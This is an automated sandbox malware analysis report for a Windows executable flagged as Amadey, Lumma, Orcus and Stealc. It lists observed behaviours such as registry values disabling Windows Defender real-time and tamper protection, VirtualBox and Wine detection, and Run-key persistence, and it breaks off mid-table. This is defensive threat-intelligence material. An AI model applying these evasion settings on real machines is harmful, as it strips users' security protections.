Malware Analysis Report

2025-01-22 15:02

Sample ID 241206-gpbj8atjhz
Target f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe
SHA256 f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813
Tags
amadey gcleaner lumma orcus stealc 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813

Threat Level: Known bad

The file f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma orcus stealc 9c9aa5 drum discovery evasion execution loader persistence rat spyware stealer trojan

GCleaner

Modifies Windows Defender Real-time Protection settings

Lumma family

Gcleaner family

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

Lumma Stealer, LummaC

Orcus family

Amadey family

Orcus

Stealc

Stealc family

Orcurs Rat Executable

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Identifies Wine through registry keys

Executes dropped EXE

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Windows security modification

Checks installed software on the system

Adds Run key to start application

AutoIT Executable

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Program crash

Unsigned PE

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Kills process with taskkill

Runs net.exe

Checks processor information in registry

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 05:58

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 05:58

Reported

2024-12-06 06:00

Platform

win7-20241023-en

Max time kernel

119s

Max time network

120s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2380 created 1208 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\6c9611a3b9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012622001\\6c9611a3b9.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\9eb85c1ad3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012619001\\9eb85c1ad3.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\992d57873c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012620001\\992d57873c.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\916674a606.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012621001\\916674a606.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f72dcfa8ca3dee1079c951692be0b687f51586cace5d485f29e1ae55fb0f7813N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4F2JK.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012618001\51f22cedd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012619001\9eb85c1ad3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012620001\992d57873c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012621001\916674a606.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012622001\6c9611a3b9.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
